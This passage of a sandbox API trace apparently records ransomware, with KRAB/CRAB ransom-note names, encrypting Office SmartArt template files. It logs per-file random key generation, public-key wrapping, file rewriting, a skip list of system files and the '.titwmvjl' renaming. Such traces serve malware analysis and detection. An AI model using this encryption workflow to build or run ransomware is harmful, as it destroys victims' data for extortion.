(lpLibFileName="advapi32.dll") returned 0x77550000 [0078.363] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.363] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.363] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.363] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503278) returned 1 [0078.363] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.364] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.364] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.364] GetLastError () returned 0x0 [0078.364] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.364] CryptDestroyKey (hKey=0x503278) returned 1 [0078.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.365] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.365] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.365] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.365] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.366] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.366] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.366] GetLastError () returned 0x0 [0078.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.366] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.366] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.366] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.366] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0078.367] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0078.367] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x2c74, lpOverlapped=0x0) returned 1 [0078.375] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffd38c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.376] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x2c74, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x2c74, lpOverlapped=0x0) returned 1 [0078.377] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.377] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.379] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.384] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.384] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.384] CloseHandle (hObject=0x2ec) returned 1 [0078.386] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328916[[fn=converging text]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328916[[fn=Converging Text]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328916[[fn=converging text]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.387] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.387] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.387] lstrcmpW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2=".") returned 1 [0078.387] lstrcmpW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="..") returned 1 [0078.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328919[[fn=Hexagon Radial]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox" [0078.387] lstrlenW (lpString=".titwmvjl") returned 9 [0078.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0078.387] VirtualAlloc (lpAddress=0x0, dwSize=0x158, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.387] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox.titwmvjl") returned 149 [0078.387] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0078.387] lstrlenW (lpString=".glox") returned 5 [0078.387] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.387] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.388] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.388] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0078.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="desktop.ini") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="autorun.inf") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="ntuser.dat") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="iconcache.db") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="bootsect.bak") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="boot.ini") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="ntuser.dat.log") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="thumbs.db") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="ntldr") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="NTDETECT.COM") returned 1 [0078.388] lstrcmpiW (lpString1="TM03328919[[fn=Hexagon Radial]].glox", lpString2="Bootfont.bin") returned 1 [0078.388] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox") returned 140 [0078.388] lstrlenW (lpString=".glox") returned 5 [0078.388] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.388] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.388] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.389] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.389] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328919[[fn=hexagon radial]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.389] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.389] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.394] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.394] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.394] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.395] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.395] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.395] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.395] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.395] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.395] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.396] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.396] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0078.397] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.397] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.397] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0078.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.397] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.397] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.397] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.397] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.398] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5031f8) returned 1 [0078.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.398] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.398] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.398] GetLastError () returned 0x0 [0078.398] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.398] CryptDestroyKey (hKey=0x5031f8) returned 1 [0078.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.399] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.399] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0078.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.399] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0078.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.400] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0078.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.400] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0078.400] GetLastError () returned 0x0 [0078.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.400] CryptDestroyKey (hKey=0x5037b8) returned 1 [0078.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.400] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.400] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0078.401] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0078.401] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x1788, lpOverlapped=0x0) returned 1 [0078.411] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xffffe878, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.411] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x1788, lpOverlapped=0x0) returned 1 [0078.419] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.419] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0078.420] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.424] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.424] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.424] CloseHandle (hObject=0x2ec) returned 1 [0078.426] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328919[[fn=hexagon radial]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328919[[fn=Hexagon Radial]].glox.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328919[[fn=hexagon radial]].glox.titwmvjl"), dwFlags=0x1) returned 1 [0078.427] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.427] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0078.427] lstrcmpW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2=".") returned 1 [0078.427] lstrcmpW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="..") returned 1 [0078.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328925[[fn=Interconnected Block Process]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox" [0078.427] lstrlenW (lpString=".titwmvjl") returned 9 [0078.427] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0078.427] VirtualAlloc (lpAddress=0x0, dwSize=0x174, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0078.427] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox.titwmvjl") returned 163 [0078.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0078.428] lstrlenW (lpString=".glox") returned 5 [0078.428] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.428] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".glox ") returned 6 [0078.428] lstrcmpiW (lpString1=".glox", lpString2=".titwmvjl") returned -1 [0078.428] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0078.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="desktop.ini") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="autorun.inf") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="ntuser.dat") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="iconcache.db") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="bootsect.bak") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="boot.ini") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="ntuser.dat.log") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="thumbs.db") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="CRAB-DECRYPT.html") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="ntldr") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="NTDETECT.COM") returned 1 [0078.428] lstrcmpiW (lpString1="TM03328925[[fn=Interconnected Block Process]].glox", lpString2="Bootfont.bin") returned 1 [0078.429] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox") returned 154 [0078.429] lstrlenW (lpString=".glox") returned 5 [0078.429] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.429] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".glox ") returned 6 [0078.429] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.429] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0078.429] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328925[[fn=Interconnected Block Process]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328925[[fn=interconnected block process]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0078.430] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.430] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0078.439] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.439] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0078.441] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0078.441] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0078.441] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0078.441] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0078.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.441] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0078.441] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.442] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0078.442] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: 